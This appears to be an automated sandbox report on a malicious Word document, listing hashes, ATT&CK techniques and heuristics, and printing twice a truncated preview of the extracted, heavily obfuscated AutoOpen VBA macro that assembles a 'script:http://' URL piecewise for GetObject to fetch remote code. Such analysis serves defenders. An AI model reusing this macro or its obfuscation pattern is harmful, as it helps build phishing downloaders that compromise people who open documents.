Office (OLE) malware analysis — malicious · dc40803bde4e7739

MALICIOUS

Office (OLE)

204.0 KB Created: 2018-04-25 21:21:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: f3efc8386158326ed570fa31cafba34b SHA-1: b3b92776fe7334ef1cf9510c0fc490f6fbf6a4e9 SHA-256: dc40803bde4e7739031c06e5d60ce608e7234fa7727c4f47f3efc607e5059ab1

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and uses GetObject, indicating an attempt to execute code. The macro's obfuscated nature and the presence of legacy WordBasic markers suggest a downloader or droppper functionality, aiming to fetch and execute further malicious content.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12065 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12065 bytes
SHA-256: `adae667031139a6386f65dfd33d3261f88627fee9e4e4f7aa8b98d791bc85528`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() papajyzeainulib = Array("qesadyloke", "kutaneaufahozo", "lydexoqemijic", "wepaqib") fohahybyzud = "dabaqo" & Val("49720 dabaqo") cubaii = LBound(Array("catygujibom", "ciieavua", "ruromozeva")) On Error Resume Next ucmaqubyj = CDate(97692) nodgiaretuta = Array("ytosazy", "xebalovsgy", "novvecet", "xonugudytakosy", "mvigucbsi") miviiowe = "fujb" & Val("27446 fujb") lajkopunaci = CDate(56388) nyhezoidybs = InStr("xdetiiupaaji", "xdetiiupaaji") eebaai = "duqaxc" & Val("96347 duqaxc") naxaqqotyf = Array("cilixeqtxije", "nyfeli", "xudoze", "gefuhiaovpa", "fohkiseis") qinutihoqy = CDate(42031) giysaxtemyc = "agagogq" & Val("28946 agagogq") pycyrobiqi = CDate(98109) tcuionoz = InStr("vuwukyguce", "vuwukyguce") jyhuwi = InStr("belixukekcud", "belixukekcud") nyimuhqafa = "pypai" nocuziaid = CDate(55461) rucer = CDate(82637) goleg = "lubibitrexepa" xucaioiu = LBound(Array("pypafydzez", "nyreaazj", "wananx", "wedamycoxyw", "qozovox")) wtzy = "byxuwafoxqut" & Val("31068 byxuwafoxqut") rivwoya = "pauwiravs" geqyqyhyl = CDate(77101) 'piriquokiva18928 piriquokiva zuroc = LBound(Array("kygoaycasiryjy", "aamedywyilajap", "gtacumpob", "tekjanfifju", "dobilygecazi")) vhtyqu = Array("mukexle", "oled", "ruqix", "hecaqoqohovinov", "xyrafqnso") 'ciahanagmy13453 ciahanagmy repuz = Array("iotaaonexoge", "byaex", "iaxovevozixefun") jmeqcorixi = "sobujegaxav" & Val("7316 sobujegaxav") pucydocul = CDate(6971) fasaoqayfu = Array("ayqecimzylezol", "hadusatenuzojyq", "raile") kypasen = vbNullString 'muhiaem57388 muhiaem zyfipopwalix = "xumajyra" uzeacateqo = LBound(Array("vulerodcko", "giqexito", "lapipyiufimo", "qynixehegovogev")) lonek = "twasih" wvuridubufi = "soyzijykf" 'gesywiqiioi52677 gesywiqiioi defugiqi = "iezofejigigok" & Val("28029 iezofejigigok") juzip = "lyaahaai" & Val("9517 lyaahaai") 'kutisby92896 kutisby zyiyqodyju = CDate(8057) buqagu = CDate(48678) ijiseagi = "cyqix" sonryfa = InStr("hogepaaibagaw", "hogepaaibagaw") hozgru = InStr("guwaqmuxy", "guwaqmuxy") cutecmuwif = LBound(Array("bpudarymul", "pexx", "qixojaroqyvk")) usiiyd = Array("zujoja", "mukifotyrej", "wkixajype", "lorydikofezyp", "banenoluiil") auckix = CDate(90988) pynupides = CDate(16117) jopfeba = InStr("cupasuzego", "cupasuzego") 'qiqaf74677 qiqaf iutohavemax = LBound(Array("vugujuguhegehi", "tejoirahyfilar", "diekyhivyze", "pezaciudy")) zotymixijydabu = CDate(21443) xijb = Array("zidiyqme", "zuxyxam", "gapaiij", "nibyfaw") vxoc = CDate(16200) iekansybov = "kadulad" & Val("53870 kadulad") 'auimehvusyb49211 auimehvusyb kypasen = kypasen + IIf((81 + 162) = 243, "scrip", "Ipd") myru = CDate(49891) lmocoiocodotib = LBound(Array("xoieto", "joydogijurijar", "lycinoaai")) jejiaire = LBound(Array("viaa", "aozyxoky", "vovidafixav", "gapeciqipadow", "faaai", "iaaelijyfeg")) kypasen = kypasen + IIf((246 + 492) = 738, "t:htt", "X") wviayfim = "viginonyfogak" lylikiziaiax = "kmagic" xokisoaovuiip = CDate(76854) rigab = "obuwfygoiyn" kypasen = kypasen + IIf((186 + 372) = 558, "p://a", "JP5po") jimuhutun = LBound(Array("conawaa", "cuifatco", "dvdazud", "ruiuaebysobitu", "pogekmizu")) 'qaayiaryfw20767 qaayiaryfw 'mlegesul47415 mlegesul kypasen = kypasen + IIf((117 + 234) = 351, "ninsn", "Jf") lodyjitewaqe = CDate(56876) roqepija = Array("ykiaga", "raiihi", "noautevak", "weiuned", "xakxe") tidot = Array("weairwopyqe", "figujufma", "leeq", "cevekuvdop", "kydiwywel") huswywaw = LBound(Array("hikat", "fidojyzenpyv", "nygqy", "veveokyzyvi", "qupiteixaiolu")) spuduag = "sytyhif" & Val("38120 sytyhif") nuaemucitoxoq = InStr("zicuii", "zicuii") 'pixijeiyg81180 pixijeiyg yluku = InStr("gipubegezetud", "gipubegezetud") kypasen = kypasen + IIf((129 + 258) = 387, "asdne", "XK") tonh ... (truncated)

SHA-256: adae667031139a6386f65dfd33d3261f88627fee9e4e4f7aa8b98d791bc85528

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
papajyzeainulib = Array("qesadyloke", "kutaneaufahozo", "lydexoqemijic", "wepaqib")
fohahybyzud = "dabaqo" & Val("49720 dabaqo")
cubaii = LBound(Array("catygujibom", "ciieavua", "ruromozeva"))
On Error Resume Next
ucmaqubyj = CDate(97692)
nodgiaretuta = Array("ytosazy", "xebalovsgy", "novvecet", "xonugudytakosy", "mvigucbsi")
miviiowe = "fujb" & Val("27446 fujb")
lajkopunaci = CDate(56388)


nyhezoidybs = InStr("xdetiiupaaji", "xdetiiupaaji")
eebaai = "duqaxc" & Val("96347 duqaxc")
naxaqqotyf = Array("cilixeqtxije", "nyfeli", "xudoze", "gefuhiaovpa", "fohkiseis")
qinutihoqy = CDate(42031)
giysaxtemyc = "agagogq" & Val("28946 agagogq")
pycyrobiqi = CDate(98109)
tcuionoz = InStr("vuwukyguce", "vuwukyguce")
jyhuwi = InStr("belixukekcud", "belixukekcud")

nyimuhqafa = "pypai"
nocuziaid = CDate(55461)
rucer = CDate(82637)

goleg = "lubibitrexepa"
xucaioiu = LBound(Array("pypafydzez", "nyreaazj", "wananx", "wedamycoxyw", "qozovox"))
wtzy = "byxuwafoxqut" & Val("31068 byxuwafoxqut")
rivwoya = "pauwiravs"
geqyqyhyl = CDate(77101)
'piriquokiva18928 piriquokiva

zuroc = LBound(Array("kygoaycasiryjy", "aamedywyilajap", "gtacumpob", "tekjanfifju", "dobilygecazi"))
vhtyqu = Array("mukexle", "oled", "ruqix", "hecaqoqohovinov", "xyrafqnso")
'ciahanagmy13453 ciahanagmy
repuz = Array("iotaaonexoge", "byaex", "iaxovevozixefun")
jmeqcorixi = "sobujegaxav" & Val("7316 sobujegaxav")
pucydocul = CDate(6971)
fasaoqayfu = Array("ayqecimzylezol", "hadusatenuzojyq", "raile")


kypasen = vbNullString
'muhiaem57388 muhiaem
zyfipopwalix = "xumajyra"
uzeacateqo = LBound(Array("vulerodcko", "giqexito", "lapipyiufimo", "qynixehegovogev"))
lonek = "twasih"
wvuridubufi = "soyzijykf"

'gesywiqiioi52677 gesywiqiioi
defugiqi = "iezofejigigok" & Val("28029 iezofejigigok")
juzip = "lyaahaai" & Val("9517 lyaahaai")
'kutisby92896 kutisby
zyiyqodyju = CDate(8057)
buqagu = CDate(48678)
ijiseagi = "cyqix"
sonryfa = InStr("hogepaaibagaw", "hogepaaibagaw")

hozgru = InStr("guwaqmuxy", "guwaqmuxy")

cutecmuwif = LBound(Array("bpudarymul", "pexx", "qixojaroqyvk"))
usiiyd = Array("zujoja", "mukifotyrej", "wkixajype", "lorydikofezyp", "banenoluiil")
auckix = CDate(90988)
pynupides = CDate(16117)
jopfeba = InStr("cupasuzego", "cupasuzego")
'qiqaf74677 qiqaf
iutohavemax = LBound(Array("vugujuguhegehi", "tejoirahyfilar", "diekyhivyze", "pezaciudy"))


zotymixijydabu = CDate(21443)
xijb = Array("zidiyqme", "zuxyxam", "gapaiij", "nibyfaw")
vxoc = CDate(16200)

iekansybov = "kadulad" & Val("53870 kadulad")
'auimehvusyb49211 auimehvusyb


 kypasen = kypasen + IIf((81 + 162) = 243, "scrip", "Ipd")
myru = CDate(49891)
lmocoiocodotib = LBound(Array("xoieto", "joydogijurijar", "lycinoaai"))

jejiaire = LBound(Array("viaa", "aozyxoky", "vovidafixav", "gapeciqipadow", "faaai", "iaaelijyfeg"))
kypasen = kypasen + IIf((246 + 492) = 738, "t:htt", "X")
wviayfim = "viginonyfogak"
lylikiziaiax = "kmagic"
xokisoaovuiip = CDate(76854)

rigab = "obuwfygoiyn"
kypasen = kypasen + IIf((186 + 372) = 558, "p://a", "JP5po")

jimuhutun = LBound(Array("conawaa", "cuifatco", "dvdazud", "ruiuaebysobitu", "pogekmizu"))
'qaayiaryfw20767 qaayiaryfw
'mlegesul47415 mlegesul
kypasen = kypasen + IIf((117 + 234) = 351, "ninsn", "Jf")
lodyjitewaqe = CDate(56876)
roqepija = Array("ykiaga", "raiihi", "noautevak", "weiuned", "xakxe")

tidot = Array("weairwopyqe", "figujufma", "leeq", "cevekuvdop", "kydiwywel")
huswywaw = LBound(Array("hikat", "fidojyzenpyv", "nygqy", "veveokyzyvi", "qupiteixaiolu"))
spuduag = "sytyhif" & Val("38120 sytyhif")
nuaemucitoxoq = InStr("zicuii", "zicuii")
'pixijeiyg81180 pixijeiyg
yluku = InStr("gipubegezetud", "gipubegezetud")
kypasen = kypasen + IIf((129 + 258) = 387, "asdne", "XK")

tonh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.